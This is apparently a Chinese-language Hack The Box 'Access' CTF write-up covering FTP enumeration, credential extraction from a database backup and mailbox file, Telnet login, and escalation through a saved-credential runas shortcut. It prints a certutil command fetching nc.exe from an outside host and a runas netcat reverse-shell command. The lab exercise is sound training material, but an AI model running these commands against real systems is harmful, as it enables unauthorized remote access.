hack the box-Access Writeup
一、摘要

Acces是搭建在Windows平台上的一道CTF题目,探究服务器上的渗透测试
二、信息搜集
题目就只给出一个IP:10.10.10.98
首先通过Nmap进行端口方面的探测
nmap -sV -sT -sC 10.10.10.98

服务器一共开放了21/Ftp、23/Telnet、80/Http端口,优先方问Http去看看网站
三、Web端测试

访问Web端口时,就出现了一个机房的照片,但是并没有从中看出什么端倪。
随后利用gobuster对网站目录进行了枚举
只跑到/aspnet_client页面
而/aspnet_client是403禁止的

四、另寻他路
之前Nmap扫描的时候有在21端口后面出现一句话
ftp-anon: Anonymous FTP login allowed (FTP code )
告诉我们FTP可以匿名登陆

进入Backups发现有个mdb文件,随后下载它

不得不说太大了

emmmm,不知道什么原因,随后请教大佬。说是要以二进制方式去下载文件,可以防止数据的丢失

如果是linux系统,利用mdbtools工具打开
mdb-tables backups.mdb

其中有个auth_user表名值得关注
mdb-export backup.mdb auth_user

其中engineer关键词很熟悉,正好是FTP上的另一个目录的
去ftp上打开另一个目录,发现一个ZIP文件,并下载


发现打开提取文件需要密码

这里遇到个毛病,估计是解压缩的问题,密码一直错误,最后换到Kali下居然就可以

pst是Microsoft Outlook电子邮件文件夹
直接下载一个Outlook查看了邮件

他说4Cc3ssC0ntr0ller就是账户security的密码
随后想到开放了23端口,便Telnet上去

五、权限提升
因为在CTF里,提权一般有自带的漏洞文件,如一个软件、一个脚本等
所以按照思路,去找相关文件
一般来,Linux下通过find找有suid的文件;windows下一般在用户目录下

有Administrator、Public、security三个用户
经判断,只有公共目录三可以利用的(因为administrator目录进不去)
进入public桌面发现有一个lnk文件

用type查看内容

runas.exe???!!!其中还跟上了/savecred参数,这说明保存了系统的凭证,可以通过这个runas反弹一个shell
cmd下可以通过以下命令下载nc.exe
certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe

再利用runas反弹shell
runas /user:Administrator /savecred "nc.exe -c cmd.exe 10.10.xx.xx 1337"

hack the box-Access Writeup的更多相关文章
- HACK TEH BOX - Under Construction(JWT密钥混淆 + SQL注入)
HACK TEH BOX - Under Construction(JWT密钥混淆 + SQL注入) 目录 1. JWT密钥混淆 2. 环境 3. Challenge 4. Walkthrough 1 ...
- Hack The Box( Starting Point )
Hack The Box [Starting Point] 初始点 -- 了解渗透测试的基础知识. 这一章节对于一个渗透小白来说,可以快速的成长.以下将提供详细的解题思路,与实操步骤. TIER 0 ...
- Hack the box: Bastion
介绍 目标:10.10.10.134 (Windows) Kali:10.10.16.65 In conclusion, Bastion is not a medium box. But it wou ...
- Bashed -- hack the box
Introduction Target: 10.10.10.68 (OS: Linux) Kali linux: 10.10.16.44 Information Enumeration Firstly ...
- Hack The Box Web Pentest 2019
[20 Points] Emdee five for life [by L4mpje] 问题描述: Can you encrypt fast enough? 初始页面,不管怎么样点击Submit都会显 ...
- Hack The Box Web Pentest 2017
[20 Points] Lernaean [by [Arrexel] 问题描述: Your target is not very good with computers. Try and guess ...
- Hack The Box 获取邀请码
TL DR; 使用curl请求下面的地址 curl -X POST https://www.hackthebox.eu/api/invite/generate {"success" ...
- hack the box -- sizzle 渗透过程总结,之前对涉及到域内证书啥的还不怎么了解
把之前的笔记搬运过来 --- 1 开了443,用smbclient建立空连接查看共享 smbclient -N -L \\\\1.1.1.1 Department Shares Operatio ...
- 2019-10-30,Hack The Box 获取邀请码
一.快速获取邀请码方法 1,使用curl请求下面的地址curl -X POST https://www.hackthebox.eu/api/invite/generate 2,在返回结果的code部分 ...
- Hack the box邀请码和注册问题总结
注意下,有3个坑, 1. 解码方式是随机的,记得看DATA下面提示用哪种 2. post时候可以直接用f12里的console,命令是: $.post('https://www.hackthebox. ...
随机推荐
- 【逆向工具】IDA使用1-VS2015版本debug查找Main函数,加载符号文件
IDA 常见操作 空格,切换反汇编视图 选择CALL或是跳转 进入函数内部或是跳转处 返回键 ESC daq.exe 分析32位程序 ,生成的IDA数据库文件是 .idb Idap64.exe 分析6 ...
- xpath路径前可用方法测试
$x("string-length(//h3[@class='t'])") 8 $x("string(//h3[@class='t'])") "XPa ...
- tomcat下部署应用helloworld
部署应用(简单)1.到Tomcat的安装目录的webapps目录,可以看到ROOT,examples, tomcat-docs之类Tomcat自带的的目录.2.在webapps目录下新建一个目录mya ...
- nginx常见异常分析
1.nginx不转发消息头header问题 proxy_set_header Host $host;proxy_set_header X-Real-IP $remote_addr;proxy_set_ ...
- Ext需要的文件目录
使用ext版本信息:ext-4.1.1a <!-- 下面是引入文件需要导入的文件信息 ext-all.css ext-all.js --><link rel="styles ...
- Android判断网络是否打开,并打开设置网络界面
由于Android的SDK版本不同所以里面的API和设置方式也是有少量变化的,尤其是在Android 3.0 及后面的版本,UI和显示方式也发生了变化,现在就以打开网络设置为例,同大家分享一下: 1. ...
- Ubuntu下安装Golang并测试HelloWorld
Intel Core i5-8250U,Ubuntu 18.04(安装在虚拟机Oracle VirtualBox 5.2.12上),Go 1.11, 安装步骤如下: -进入Go文档官网: https: ...
- Android9.0新特性曝光,你准备好了吗
Android9.0最早出现在2018年1月25日的谷歌官网上,初步代号已经确定为“Pistachio Ice Cream”(开心果冰淇淋),不过按照Google的惯例,如此长的三个单词代号,通常都只 ...
- OCM_第四天课程:Section2 —》GC 的安装和配置
注:本文为原著(其内容来自 腾科教育培训课堂).阅读本文注意事项如下: 1:所有文章的转载请标注本文出处. 2:本文非本人不得用于商业用途.违者将承当相应法律责任. 3:该系列文章目录列表: 一:&l ...
- 【ES】学习2-搜索
1.空搜索 返回所有索引下的所有文档 GET /_search 设置超时.timeout 不是停止执行查询,它仅仅是告知正在协调的节点返回到目前为止收集的结果并且关闭连接.在后台,其他的分片可能仍在执 ...